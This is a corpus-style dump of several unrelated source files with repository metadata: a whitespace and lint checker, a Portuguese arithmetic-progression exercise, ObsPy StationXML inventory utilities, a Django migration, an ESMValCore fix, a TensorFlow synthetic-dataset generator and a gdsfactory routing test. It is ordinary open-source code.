n = len(s) - len(s.lstrip())
if not s[n:n + 3] in ['...', '>>>']:
check = s[:n]
else:
smore = s[n + 3:]
check = s[:n] + smore[:len(smore) - len(smore.lstrip())]
return check.expandtabs() != check
def use_tab_rule(fname):
return not (basename(fname) == 'Makefile' or splitext(fname)[1] == '.bat')
exclude_paths = ("CHANGELOG",)
exclude_exts = (".patch", ".png", ".jpg", ".pxm", ".ico", ".ics", ".gz", ".gif", ".enc", ".svg", ".xml", ".shp",
".dbf", ".shx", "otf", ".eot", ".ttf", ".woff", ".woff2")
exclude_dirs = ("sphinx/draw.io",)
def collect_errors():
errors = []
def test_this_file(fname, test_file):
line = None
for idx, line in enumerate(test_file):
line_no = idx + 1
if idx == 0 and len(line.strip()) == 0:
errors.append((message_multi_bof, fname, line_no))
if line.endswith(" \n") or line.endswith("\t\n"):
errors.append((message_space, fname, line_no))
if line.endswith("\r\n") or line.endswith("\r"):
errors.append((message_carriage, fname, line_no))
if use_tab_rule(fname) and tab_in_leading(line):
errors.append((message_tabs, fname, line_no))
#if len(line) > MAX_LINE_LENGTH:
# errors.append((message_too_long, fname, line_no))
if line is not None:
if idx > 0 and len(line.strip()) == 0:
errors.append((message_multi_eof, fname, line_no))
if not line.endswith('\n'):
errors.append((message_eof, fname, line_no))
paths = subprocess.check_output(["git", "ls-files"]).decode('utf-8').split("\n")
for path in paths:
if not path:
continue
if path in exclude_paths:
continue
if path.endswith(exclude_exts):
continue
if path.startswith(exclude_dirs):
continue
with io.open(path, 'r', encoding='utf-8') as file:
test_this_file(path, file)
return [ msg % (relpath(fname, TOP_PATH), line_no) for (msg, fname, line_no) in errors ]
def bad_files():
return " ".join(sorted(set([ file for (_, file, _) in collect_errors() ])))
| 36.306569
| 112
| 0.528749
|
4a01fb3ffc17fb03a61e383d701cf3ffe896d716
| 537
|
py
|
Python
|
curso em video/python/mundo 2/ex 061.py
|
KenzoDezotti/cursoemvideo
|
6eba03e67192f7384092192ed2cc1a8e59efd9b9
|
[
"MIT"
] | null | null | null |
curso em video/python/mundo 2/ex 061.py
|
KenzoDezotti/cursoemvideo
|
6eba03e67192f7384092192ed2cc1a8e59efd9b9
|
[
"MIT"
] | null | null | null |
curso em video/python/mundo 2/ex 061.py
|
KenzoDezotti/cursoemvideo
|
6eba03e67192f7384092192ed2cc1a8e59efd9b9
|
[
"MIT"
] | null | null | null |
# z=int(input('digite um ponto de inico para a P.A. : '))
x = int(input('digite a razão: '))
# for c in range(0,10):
# print(z, end=', ')
# z = z + x
# print(z)
w = 10
cont = 0
num1 = int(input('digite um ponto de inico para a P.A. : '))
print('os primeiros numeros da P.A. são: {}'.format(num1), end='-')
while w != 0:
w -= 1
cont += 1
num1 += x
print(num1, end='-')
if w == 0:
w = int(input('gostaria de ver mais quantos termos? '))
print('a P.A. foi finalizada com {} termos mostrados'.format(num1))
| 28.263158
| 67
| 0.562384
|
4a01fb5cb082f1800253c25517b9ac43808ffc09
| 29,237
|
py
|
Python
|
IRIS_data_download/IRIS_download_support/obspy/core/inventory/util.py
|
earthinversion/Fnet_IRIS_data_automated_download
|
09a6e0c992662feac95744935e038d1c68539fa1
|
[
"MIT"
] | 2
|
2020-03-05T01:03:01.000Z
|
2020-12-17T05:04:07.000Z
|
IRIS_data_download/IRIS_download_support/obspy/core/inventory/util.py
|
earthinversion/Fnet_IRIS_data_automated_download
|
09a6e0c992662feac95744935e038d1c68539fa1
|
[
"MIT"
] | 4
|
2021-03-31T19:25:55.000Z
|
2021-12-13T20:32:46.000Z
|
IRIS_data_download/IRIS_download_support/obspy/core/inventory/util.py
|
earthinversion/Fnet_IRIS_data_automated_download
|
09a6e0c992662feac95744935e038d1c68539fa1
|
[
"MIT"
] | 2
|
2020-09-08T19:33:40.000Z
|
2021-04-05T09:47:50.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Utility objects.
:copyright:
Lion Krischer (krischer@geophysik.uni-muenchen.de), 2013
:license:
GNU Lesser General Public License, Version 3
(https://www.gnu.org/copyleft/lesser.html)
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from future.builtins import * # NOQA
import copy
import re
from textwrap import TextWrapper
from obspy import UTCDateTime
from obspy.core.util.base import ComparingObject
from obspy.core.util.obspy_types import (FloatWithUncertaintiesAndUnit,
FloatWithUncertaintiesFixedUnit)
class BaseNode(ComparingObject):
"""
From the StationXML definition:
A base node type for derivation of: Network, Station and Channel
types.
The parent class for the network, station and channel classes.
"""
def __init__(self, code, description=None, comments=None, start_date=None,
end_date=None, restricted_status=None, alternate_code=None,
historical_code=None, data_availability=None):
"""
:type code: str
:param code: The SEED network, station, or channel code
:type description: str, optional
:param description: A description of the resource
:type comments: list of :class:`Comment`, optional
:param comments: An arbitrary number of comments to the resource
:type start_date: :class:`~obspy.core.utcdatetime.UTCDateTime`,
optional
:param start_date: The start date of the resource
:type end_date: :class:`~obspy.core.utcdatetime.UTCDateTime`, optional
:param end_date: The end date of the resource
:type restricted_status: str, optional
:param restricted_status: The restriction status
:type alternate_code: str, optional
:param alternate_code: A code used for display or association,
alternate to the SEED-compliant code.
:type historical_code: str, optional
:param historical_code: A previously used code if different from the
current code.
:type data_availability: :class:`~obspy.station.util.DataAvailability`
:param data_availability: Information about time series availability
for the network/station/channel.
"""
self.code = code
self.comments = comments or []
self.description = description
self.start_date = start_date
self.end_date = end_date
self.restricted_status = restricted_status
self.alternate_code = alternate_code
self.historical_code = historical_code
self.data_availability = data_availability
@property
def code(self):
return self._code
@code.setter
def code(self, value):
if value is None:
msg = "A code is required"
raise ValueError(msg)
self._code = str(value).strip()
@property
def alternate_code(self):
"""
From the StationXML definition:
A code used for display or association, alternate to the
SEED-compliant code.
"""
return self._alternate_code
@alternate_code.setter
def alternate_code(self, value):
if value:
self._alternate_code = value.strip()
else:
self._alternate_code = None
@property
def historical_code(self):
"""
From the StationXML definition:
A previously used code if different from the current code.
"""
return self._historical_code
@historical_code.setter
def historical_code(self, value):
if value:
self._historical_code = value.strip()
else:
self._historical_code = None
def copy(self):
"""
Returns a deepcopy of the object.
:rtype: same class as original object
:return: Copy of current object.
.. rubric:: Examples
1. Create a station object and copy it
>>> from obspy import read_inventory
>>> sta = read_inventory()[0][0]
>>> sta2 = sta.copy()
The two objects are not the same:
>>> sta is sta2
False
But they have equal data (before applying further processing):
>>> sta == sta2
True
2. The following example shows how to make an alias but not copy the
data. Any changes on ``st3`` would also change the contents of
``st``.
>>> sta3 = sta
>>> sta is sta3
True
>>> sta == sta3
True
"""
return copy.deepcopy(self)
def is_active(self, time=None, starttime=None, endtime=None):
"""
Checks if the item was active at some given point in time (`time`)
and/or if it was active at some point during a certain time range
(`starttime`, `endtime`).
.. note::
If none of the time constraints is specified the result will always
be `True`.
:type time: :class:`~obspy.core.utcdatetime.UTCDateTime`
:param time: Only include networks/stations/channels active at given
point in time.
:type starttime: :class:`~obspy.core.utcdatetime.UTCDateTime`
:param starttime: Only include networks/stations/channels active at or
after given point in time (i.e. channels ending before given time
will not be shown).
:type endtime: :class:`~obspy.core.utcdatetime.UTCDateTime`
:param endtime: Only include networks/stations/channels active before
or at given point in time (i.e. channels starting after given time
will not be shown).
:rtype: bool
:returns: `True`/`False` depending on whether the item matches the
specified time criteria.
"""
if time is not None:
if self.start_date is not None and time < self.start_date:
return False
if self.end_date is not None and time > self.end_date:
return False
if starttime is not None and self.end_date is not None:
if starttime > self.end_date:
return False
if endtime is not None and self.start_date is not None:
if endtime < self.start_date:
return False
return True
class DataAvailability(ComparingObject):
"""
A description of time series data availability. This information should
be considered transient and is primarily useful as a guide for
generating time series data requests. The information for a
DataAvailability (time) span may be specific to the time range used in a
request that resulted in the document or limited to the availability of
data within the request range. These details may or may not be
retained when synchronizing metadata between data centers.
"""
def __init__(self, start, end):
self.start = UTCDateTime(start)
self.end = UTCDateTime(end)
def __str__(self):
return "Data Availability from %s to %s." % (str(self.start),
str(self.end))
def _repr_pretty_(self, p, cycle):
p.text(str(self))
class Equipment(ComparingObject):
"""
An object containing a detailed description of an equipment.
"""
def __init__(self, type=None, description=None, manufacturer=None,
vendor=None, model=None, serial_number=None,
installation_date=None, removal_date=None,
calibration_dates=None, resource_id=None):
"""
:type type: str
:param type: The equipment type
:type description: str
:param description: Description of the equipment
:type manufacturer: str
:param manufacturer: The manufacturer of the equipment
:type vendor: str
:param vendor: The vendor of the equipment
:type model: str
:param model: The model of the equipment
:type serial_number: str
:param serial_number: The serial number of the equipment
:type installation_date: :class:`~obspy.core.utcdatetime.UTCDateTime`
:param installation_date: The installation date of the equipment
:type removal_date: :class:`~obspy.core.utcdatetime.UTCDateTime`
:param removal_date: The removal data of the equipment
:type calibration_dates: list of
:class:`~obspy.core.utcdatetime.UTCDateTime`
:param calibration_dates: A list with all calibration dates of the
equipment.
:type resource_id: str
:param resource_id: This field contains a string that should serve as a
unique resource identifier. This identifier can be interpreted
differently depending on the data center/software that generated
the document. Also, we recommend to use something like
GENERATOR:Meaningful ID. As a common behavior equipment with the
same ID should contain the same information/be derived from the
same base instruments.
"""
self.type = type
self.description = description
self.manufacturer = manufacturer
self.vendor = vendor
self.model = model
self.serial_number = serial_number
self.installation_date = installation_date
self.removal_date = removal_date
self.calibration_dates = calibration_dates or []
self.resource_id = resource_id
@property
def installation_date(self):
return self._installation_date
@installation_date.setter
def installation_date(self, value):
if value is None or isinstance(value, UTCDateTime):
self._installation_date = value
return
self._installation_date = UTCDateTime(value)
@property
def removal_date(self):
return self._removal_date
@removal_date.setter
def removal_date(self, value):
if value is None or isinstance(value, UTCDateTime):
self._removal_date = value
return
self._removal_date = UTCDateTime(value)
def __str__(self):
ret = ("Equipment:\n"
"\tType: {type}\n"
"\tDescription: {description}\n"
"\tManufacturer: {manufacturer}\n"
"\tVendor: {vendor}\n"
"\tModel: {model}\n"
"\tSerial number: {serial_number}\n"
"\tInstallation date: {installation_date}\n"
"\tRemoval date: {removal_date}\n"
"\tResource id: {resource_id}\n"
"\tCalibration Dates:\n")
for calib_date in self.calibration_dates:
ret += "\t\t%s\n" % calib_date
ret = ret.format(**self.__dict__)
return ret
def _repr_pretty_(self, p, cycle):
p.text(str(self))
class Operator(ComparingObject):
"""
An operating agency and associated contact persons. If there are multiple
operators, each one should be encapsulated within an Operator object. Since
the Contact element is a generic type that represents any contact person,
it also has its own optional Agency element.
"""
def __init__(self, agencies, contacts=None, website=None):
"""
:type agencies: list of str
:param agencies: The agencies of the operator.
:type contacts: list of :class:`Person`, optional
:param contacts: One or more contact persons.
:type website: str, optional
:param website: The website.
"""
self.agencies = agencies
self.contacts = contacts or []
self.website = website
@property
def agencies(self):
return self._agencies
@agencies.setter
def agencies(self, value):
if not hasattr(value, "__iter__") or len(value) < 1:
msg = ("agencies needs to be iterable, e.g. a list, and contain "
"at least one entry.")
raise ValueError(msg)
self._agencies = value
@property
def contacts(self):
return self._contacts
@contacts.setter
def contacts(self, value):
if not hasattr(value, "__iter__"):
msg = ("contacts needs to be iterable, e.g. a list.")
raise ValueError(msg)
self._contacts = value
class Person(ComparingObject):
"""
From the StationXML definition:
Representation of a person's contact information. A person can belong
to multiple agencies and have multiple email addresses and phone
numbers.
"""
email_pattern = re.compile(r"[\w\.\-_]+@[\w\.\-_]+")
def __init__(self, names=None, agencies=None, emails=None, phones=None):
"""
:type names: list of str, optional
:param names: Self-explanatory. Multiple names allowed.
:type agencies: list of str, optional
:param agencies: Self-explanatory. Multiple agencies allowed.
:type emails: list of str, optional
:param emails: Self-explanatory. Multiple emails allowed.
:type phones: list of :class:`PhoneNumber`, optional
:param phones: Self-explanatory. Multiple phone numbers allowed.
"""
self.names = names or []
self.agencies = agencies or []
self.emails = emails or []
self.phones = phones or []
@property
def names(self):
return self._names
@names.setter
def names(self, value):
if not hasattr(value, "__iter__"):
msg = "names needs to be iterable, e.g. a list."
raise ValueError(msg)
self._names = value
@property
def agencies(self):
return self._agencies
@agencies.setter
def agencies(self, value):
if not hasattr(value, "__iter__"):
msg = "agencies needs to be iterable, e.g. a list."
raise ValueError(msg)
self._agencies = value
@property
def emails(self):
return self._emails
@emails.setter
def emails(self, values):
if not hasattr(values, "__iter__"):
msg = "emails needs to be iterable, e.g. a list."
raise ValueError(msg)
for value in values:
if re.match(self.email_pattern, value) is None:
msg = ("emails needs to match the pattern "
r"'[\w\.\-_]+@[\w\.\-_]+'")
raise ValueError(msg)
self._emails = values
@property
def phones(self):
return self._phones
@phones.setter
def phones(self, values):
if not hasattr(values, "__iter__"):
msg = "phones needs to be iterable, e.g. a list."
raise ValueError(msg)
self._phones = values
class PhoneNumber(ComparingObject):
"""
A simple object representing a phone number.
"""
phone_pattern = re.compile("^[0-9]+-[0-9]+$")
def __init__(self, area_code, phone_number, country_code=None,
description=None):
"""
:type area_code: int
:param area_code: The area code.
:type phone_number: str
:param phone_number: The phone number minus the country and area code.
Must be in the form "[0-9]+-[0-9]+", e.g. 1234-5678.
:type country_code: int, optional
:param country_code: The country code.
:type description: str, optional
:param description: Any additional information.
"""
self.country_code = country_code
self.area_code = area_code
self.phone_number = phone_number
self.description = description
@property
def phone_number(self):
return self._phone_number
@phone_number.setter
def phone_number(self, value):
if re.match(self.phone_pattern, value) is None:
msg = "phone_number needs to match the pattern '[0-9]+-[0-9]+'"
raise ValueError(msg)
self._phone_number = value
class ExternalReference(ComparingObject):
"""
From the StationXML definition:
This type contains a URI and description for external data that users
may want to reference in StationXML.
"""
def __init__(self, uri, description):
"""
:type uri: str
:param uri: The URI to the external data.
:type description: str
:param description: A description of the external data.
"""
self.uri = uri
self.description = description
class Comment(ComparingObject):
"""
From the StationXML definition:
Container for a comment or log entry. Corresponds to SEED blockettes
31, 51 and 59.
"""
def __init__(self, value, id=None, begin_effective_time=None,
end_effective_time=None, authors=None):
"""
:type value: str
:param value: The actual comment string
:type id: int
:param id: ID of comment, must be 0 or greater.
:type begin_effective_time:
:class:`~obspy.core.utcdatetime.UTCDateTime`, optional
:param begin_effective_time: The effective start date.
:type end_effective_time:
:class:`~obspy.core.utcdatetime.UTCDateTime`, optional
:param end_effective_time: The effective end date.
:type authors: list of :class:`Person`, optional
:param authors: The authors of this comment.
"""
self.value = value
self.begin_effective_time = begin_effective_time
self.end_effective_time = end_effective_time
self.authors = authors or []
self.id = id
@property
def id(self):
return self._id
@id.setter
def id(self, value):
if value is None:
self._id = value
return
if not int(value) >= 0:
msg = "ID must be 0 or positive integer."
raise ValueError(msg)
self._id = value
@property
def value(self):
return self._value
@value.setter
def value(self, value):
self._value = str(value)
@property
def begin_effective_time(self):
return self._begin_effective_time
@begin_effective_time.setter
def begin_effective_time(self, value):
if value is None:
self._begin_effective_time = None
return
self._begin_effective_time = UTCDateTime(value)
@property
def end_effective_time(self):
return self._end_effective_time
@end_effective_time.setter
def end_effective_time(self, value):
if value is None:
self._end_effective_time = None
return
self._end_effective_time = UTCDateTime(value)
@property
def authors(self):
return self._authors
@authors.setter
def authors(self, values):
if not hasattr(values, "__iter__"):
msg = "authors needs to be iterable, e.g. a list."
raise ValueError(msg)
self._authors = values
class Site(ComparingObject):
"""
From the StationXML definition:
Description of a site location using name and optional geopolitical
boundaries (country, city, etc.).
"""
def __init__(self, name="", description=None, town=None, county=None,
region=None, country=None):
"""
:type name: str
:param name: The commonly used name of this station, equivalent to the
SEED blockette 50, field 9.
:type description: str, optional
:param description: A longer description of the location of this
station, e.g. "NW corner of Yellowstone National Park" or "20
miles west of Highway 40."
:type town: str, optional
:param town: The town or city closest to the station.
:type county: str, optional
:param county: The county.
:type region: str, optional
:param region: The state, province, or region of this site.
:type country: str, optional
:param country: The country.
"""
self.name = name
self.description = description
self.town = town
self.county = county
self.region = region
self.country = country
def __str__(self):
ret = ("Site: {name}\n"
"\tDescription: {description}\n"
"\tTown: {town}\n"
"\tCounty: {county}\n"
"\tRegion: {region}\n"
"\tCountry: {country}")
ret = ret.format(
name=self.name, description=self.description,
town=self.town, county=self.county, region=self.region,
country=self.country)
return ret
def _repr_pretty_(self, p, cycle):
p.text(str(self))
class Latitude(FloatWithUncertaintiesFixedUnit):
"""
Latitude object
:type value: float
:param value: Latitude value
:type lower_uncertainty: float
:param lower_uncertainty: Lower uncertainty (aka minusError)
:type upper_uncertainty: float
:param upper_uncertainty: Upper uncertainty (aka plusError)
:type datum: str
:param datum: Datum for latitude coordinate
"""
_minimum = -90
_maximum = 90
_unit = "DEGREES"
def __init__(self, value, lower_uncertainty=None, upper_uncertainty=None,
datum=None):
"""
"""
self.datum = datum
super(Latitude, self).__init__(
value, lower_uncertainty=lower_uncertainty,
upper_uncertainty=upper_uncertainty)
class Longitude(FloatWithUncertaintiesFixedUnit):
"""
Longitude object
:type value: float
:param value: Longitude value
:type lower_uncertainty: float
:param lower_uncertainty: Lower uncertainty (aka minusError)
:type upper_uncertainty: float
:param upper_uncertainty: Upper uncertainty (aka plusError)
:type datum: str
:param datum: Datum for longitude coordinate
"""
_minimum = -180
_maximum = 180
unit = "DEGREES"
def __init__(self, value, lower_uncertainty=None, upper_uncertainty=None,
datum=None):
"""
"""
self.datum = datum
super(Longitude, self).__init__(
value, lower_uncertainty=lower_uncertainty,
upper_uncertainty=upper_uncertainty)
class Distance(FloatWithUncertaintiesAndUnit):
"""
Distance object
:type value: float
:param value: Distance value
:type lower_uncertainty: float
:param lower_uncertainty: Lower uncertainty (aka minusError)
:type upper_uncertainty: float
:param upper_uncertainty: Upper uncertainty (aka plusError)
:type unit: str
:param unit: Unit for distance measure.
"""
def __init__(self, value, lower_uncertainty=None, upper_uncertainty=None,
unit="METERS"):
super(Distance, self).__init__(
value, lower_uncertainty=lower_uncertainty,
upper_uncertainty=upper_uncertainty)
self._unit = unit
class Azimuth(FloatWithUncertaintiesFixedUnit):
"""
Azimuth object
:type value: float
:param value: Azimuth value
:type lower_uncertainty: float
:param lower_uncertainty: Lower uncertainty (aka minusError)
:type upper_uncertainty: float
:param upper_uncertainty: Upper uncertainty (aka plusError)
"""
_minimum = 0
_maximum = 360
unit = "DEGREES"
class Dip(FloatWithUncertaintiesFixedUnit):
"""
Dip object
:type value: float
:param value: Dip value
:type lower_uncertainty: float
:param lower_uncertainty: Lower uncertainty (aka minusError)
:type upper_uncertainty: float
:param upper_uncertainty: Upper uncertainty (aka plusError)
"""
_minimum = -90
_maximum = 90
unit = "DEGREES"
class ClockDrift(FloatWithUncertaintiesFixedUnit):
"""
ClockDrift object
:type value: float
:param value: ClockDrift value
:type lower_uncertainty: float
:param lower_uncertainty: Lower uncertainty (aka minusError)
:type upper_uncertainty: float
:param upper_uncertainty: Upper uncertainty (aka plusError)
"""
_minimum = 0
unit = "SECONDS/SAMPLE"
class SampleRate(FloatWithUncertaintiesFixedUnit):
"""
SampleRate object
:type value: float
:param value: ClockDrift value
:type lower_uncertainty: float
:param lower_uncertainty: Lower uncertainty (aka minusError)
:type upper_uncertainty: float
:param upper_uncertainty: Upper uncertainty (aka plusError)
"""
unit = "SAMPLES/S"
class Frequency(FloatWithUncertaintiesFixedUnit):
"""
Frequency object
:type value: float
:param value: Frequency value
:type lower_uncertainty: float
:param lower_uncertainty: Lower uncertainty (aka minusError)
:type upper_uncertainty: float
:param upper_uncertainty: Upper uncertainty (aka plusError)
"""
unit = "HERTZ"
class Angle(FloatWithUncertaintiesFixedUnit):
"""
Angle object
:type value: float
:param value: Angle value
:type lower_uncertainty: float
:param lower_uncertainty: Lower uncertainty (aka minusError)
:type upper_uncertainty: float
:param upper_uncertainty: Upper uncertainty (aka plusError)
"""
_minimum = -360
_maximum = 360
unit = "DEGREES"
def _unified_content_strings(contents):
contents_unique = sorted(set(contents), key=_seed_id_keyfunction)
contents_counts = [
(item, contents.count(item)) for item in contents_unique]
items = [item if count == 1 else "{} ({}x)".format(item, count)
for item, count in contents_counts]
return items
# make TextWrapper only split on colons, so that we avoid splitting in between
# e.g. network code and network code occurence count (can be controlled with
# class attributes).
# Also avoid lines starting with ", " (need to patch the class for this)
class InventoryTextWrapper(TextWrapper):
wordsep_re = re.compile(r'(, )')
wordsep_simple_re = re.compile(r'(, )')
def _wrap_chunks(self, *args, **kwargs):
# the following doesn't work somehow (likely because of future??)
# lines = super(InventoryTextWrapper, self)._wrap_chunks(
# *args, **kwargs)
lines = TextWrapper._wrap_chunks(self, *args, **kwargs)
lines = [re.sub(r'([\b\s]+), (.*)', r'\1\2', line, count=1)
for line in lines]
return lines
def _textwrap(text, *args, **kwargs):
return InventoryTextWrapper(*args, **kwargs).wrap(text)
def _seed_id_keyfunction(x):
"""
Keyfunction to use in sorting two (partial) SEED IDs
Assumes that the last (or only) "."-separated part is a channel code.
Assumes the last character is a the component code and sorts it
"Z"-"N"-"E"-others_lexical.
"""
# for comparison we build a list of 5 SEED code pieces:
# [network, station, location, band+instrument, component]
# with partial codes (i.e. not 4 fields after splitting at dots),
# we go with the following assumptions (these seem a bit random, but that's
# what can be encountered in string representations of the Inventory object
# hierarchy):
# - no dot means network code only (e.g. "IU")
# - one dot means network.station code only (e.g. "IU.ANMO")
# - two dots means station.location.channel code only (e.g. "ANMO.10.BHZ")
# - three dots: full SEED ID (e.g. "IU.ANMO.10.BHZ")
# - more dots: sort after any of the previous, plain lexical sort
# if no "." in the string: assume it's a network code
# split to get rid of the description that that is added to networks and
# stations which might also contain dots.
number_of_dots = x.strip().split()[0].count(".")
x = x.upper()
if number_of_dots == 0:
x = [x] + [""] * 4
elif number_of_dots == 1:
x = x.split(".") + [""] * 3
elif number_of_dots in (2, 3):
x = x.split(".")
if number_of_dots == 2:
x = [""] + x
# split channel code into band+instrument code and component code
x = x[:-1] + [x[-1][:-1], x[-1] and x[-1][-1] or '']
# special comparison for component code, convert "ZNE" to integers
# which compare less than any character
comp = "ZNE".find(x[-1])
# last item is component code, either the original 1-char string, or an
# int from 0-2 if any of "ZNE". Python3 does not allow comparison of
# int and string anymore (Python 2 always compares ints smaller than
# any string), so we need to work around this by making this last item
# a tuple with first item False for ints and True for strings.
if comp >= 0:
x[-1] = (False, comp)
else:
x[-1] = (True, x[-1])
# all other cases, just convert the upper case string to a single item
# list - it will compare greater than any of the split lists.
else:
x = [x, ]
return x
if __name__ == '__main__':
import doctest
doctest.testmod(exclude_empty=True)
| 33.8
| 79
| 0.625543
|
4a01fc65bf751adb385ee27f14149ec365da06af
| 1,911
|
py
|
Python
|
thecut/googleanalytics/migrations/0001_initial.py
|
thecut/thecut-googleanalytics
|
8d0a9869829f15d5a630ed85e5d9a7ea9d4825fc
|
[
"Apache-2.0"
] | 1
|
2019-08-13T21:05:10.000Z
|
2019-08-13T21:05:10.000Z
|
thecut/googleanalytics/migrations/0001_initial.py
|
thecut/thecut-googleanalytics
|
8d0a9869829f15d5a630ed85e5d9a7ea9d4825fc
|
[
"Apache-2.0"
] | null | null | null |
thecut/googleanalytics/migrations/0001_initial.py
|
thecut/thecut-googleanalytics
|
8d0a9869829f15d5a630ed85e5d9a7ea9d4825fc
|
[
"Apache-2.0"
] | 2
|
2017-05-18T04:44:22.000Z
|
2020-02-27T01:57:41.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import oauth2client.django_orm
class Migration(migrations.Migration):
dependencies = [
('sites', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('web_property_id', models.CharField(help_text='The property tracking ID is available when viewing the "Tracking Code" details in the Google Analytics admin.', max_length=25, verbose_name='property tracking ID')),
('profile_id', models.CharField(default='', max_length=25, verbose_name='view (profile) ID', blank=True)),
('display_features', models.BooleanField(default=False, help_text='Used for remarketing, demographics and interest reporting.', verbose_name='Use Display advertising features?')),
('is_enabled', models.BooleanField(default=False, help_text='Is Google Analytics tracking enabled on the website?', verbose_name='enabled')),
],
options={
'ordering': ['site'],
'verbose_name': 'view (profile)',
'verbose_name_plural': 'views (profiles)',
},
),
migrations.CreateModel(
name='ProfileOAuth2Credentials',
fields=[
('id', models.OneToOneField(related_name='_oauth2_credentials', primary_key=True, serialize=False, to='googleanalytics.Profile')),
('credentials', oauth2client.django_orm.CredentialsField(null=True)),
],
),
migrations.AddField(
model_name='profile',
name='site',
field=models.OneToOneField(related_name='+', to='sites.Site'),
),
]
| 44.44186
| 229
| 0.618524
|
4a01fca0feb53ef5e987108efa7387678f3a176a
| 109
|
py
|
Python
|
esmvalcore/cmor/_fixes/cmip6/e3sm_1_0.py
|
markelg/ESMValCore
|
b2f7ffc3232f174dd5ebc50ad20b4a02d3517c2c
|
[
"Apache-2.0"
] | 26
|
2019-06-07T07:50:07.000Z
|
2022-03-22T21:04:01.000Z
|
esmvalcore/cmor/_fixes/cmip6/e3sm_1_0.py
|
markelg/ESMValCore
|
b2f7ffc3232f174dd5ebc50ad20b4a02d3517c2c
|
[
"Apache-2.0"
] | 1,370
|
2019-06-06T09:03:07.000Z
|
2022-03-31T04:37:20.000Z
|
esmvalcore/cmor/_fixes/cmip6/e3sm_1_0.py
|
zklaus/ESMValCore
|
5656fb8b546eeb4d750a424de7ed56a237edfabb
|
[
"Apache-2.0"
] | 26
|
2019-07-03T13:08:48.000Z
|
2022-03-02T16:08:47.000Z
|
"""Fixes for E3SM-1-0 model."""
from ..common import ClFixHybridPressureCoord
Cl = ClFixHybridPressureCoord
| 21.8
| 45
| 0.779817
|
4a01fd0409d8b31b2d0e58c3a2de7cae61dccf7d
| 2,568
|
py
|
Python
|
research/compression/entropy_coder/dataset/gen_synthetic_dataset.py
|
vincentcheny/models
|
afb1a59fc1bc792ac72d1a3e22e2469020529788
|
[
"Apache-2.0"
] | 1
|
2019-09-11T09:41:11.000Z
|
2019-09-11T09:41:11.000Z
|
research/compression/entropy_coder/dataset/gen_synthetic_dataset.py
|
vincentcheny/models
|
afb1a59fc1bc792ac72d1a3e22e2469020529788
|
[
"Apache-2.0"
] | null | null | null |
research/compression/entropy_coder/dataset/gen_synthetic_dataset.py
|
vincentcheny/models
|
afb1a59fc1bc792ac72d1a3e22e2469020529788
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Generate a synthetic dataset."""
import os
import numpy as np
from six.moves import xrange
import tensorflow as tf
import synthetic_model
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string(
'dataset_dir', None,
"""Directory where to write the dataset and the configs.""")
tf.app.flags.DEFINE_integer(
'count', 1000,
"""Number of samples to generate.""")
def int64_feature(values):
"""Returns a TF-Feature of int64s.
Args:
values: A scalar or list of values.
Returns:
A TF-Feature.
"""
if not isinstance(values, (tuple, list)):
values = [values]
return tf.train.Feature(int64_list=tf.train.Int64List(value=values))
def float_feature(values):
"""Returns a TF-Feature of floats.
Args:
values: A scalar of list of values.
Returns:
A TF-Feature.
"""
if not isinstance(values, (tuple, list)):
values = [values]
return tf.train.Feature(float_list=tf.train.FloatList(value=values))
def AddToTFRecord(code, tfrecord_writer):
example = tf.train.Example(features=tf.train.Features(feature={
'code_shape': int64_feature(code.shape),
'code': float_feature(code.flatten().tolist()),
}))
tfrecord_writer.write(example.SerializeToString())
def GenerateDataset(filename, count, code_shape):
with tf.python_io.TFRecordWriter(filename) as tfrecord_writer:
for _ in xrange(count):
code = synthetic_model.GenerateSingleCode(code_shape)
# Convert {0,1} codes to {-1,+1} codes.
code = 2.0 * code - 1.0
AddToTFRecord(code, tfrecord_writer)
def main(argv=None): # pylint: disable=unused-argument
GenerateDataset(os.path.join(FLAGS.dataset_dir + '/synthetic_dataset'),
FLAGS.count,
[35, 48, 8])
if __name__ == '__main__':
tf.app.run()
| 28.533333
| 81
| 0.6581
|
4a01fd75de6859fd55b889286e85c9cba6b867ae
| 521
|
py
|
Python
|
pp/routing/test_route_south.py
|
flaport/gdsfactory
|
1f2e844c1fe27b9c6340e2d51500fd3358fa16e5
|
[
"MIT"
] | 8
|
2020-08-25T11:25:18.000Z
|
2022-03-27T11:32:11.000Z
|
pp/routing/test_route_south.py
|
flaport/gdsfactory
|
1f2e844c1fe27b9c6340e2d51500fd3358fa16e5
|
[
"MIT"
] | null | null | null |
pp/routing/test_route_south.py
|
flaport/gdsfactory
|
1f2e844c1fe27b9c6340e2d51500fd3358fa16e5
|
[
"MIT"
] | 1
|
2022-03-04T07:03:29.000Z
|
2022-03-04T07:03:29.000Z
|
import numpy as np
import pp
@pp.cell
def test_route_south():
c = pp.Component()
cr = c << pp.c.mmi2x2()
routes, ports = pp.routing.route_south(cr)
l1 = 17.207963267948966
l2 = 22.35796326794896
lengths = [l1, l2, l1, l2]
for r, length in zip(routes, lengths):
print(r.parent.length)
for r, length in zip(routes, lengths):
assert np.isclose(r.parent.length, length)
c.add(routes)
return c
if __name__ == "__main__":
c = test_route_south()
pp.show(c)
| 19.296296
| 50
| 0.621881
|
4a01fdea04e27e0a1adde9138ac9925bec28d6d6
| 950
|
py
|
Python
|
function/handler.py
|
saidsef/tika-document-to-text
|
3e1d71ccb2a67c62429d91cfe09f36fe23936caf
|
[
"MIT"
] | null | null | null |
function/handler.py
|
saidsef/tika-document-to-text
|
3e1d71ccb2a67c62429d91cfe09f36fe23936caf
|
[
"MIT"
] | 10
|
2022-01-14T12:07:27.000Z
|
2022-03-01T15:36:56.000Z
|
function/handler.py
|
saidsef/tika-document-to-text
|
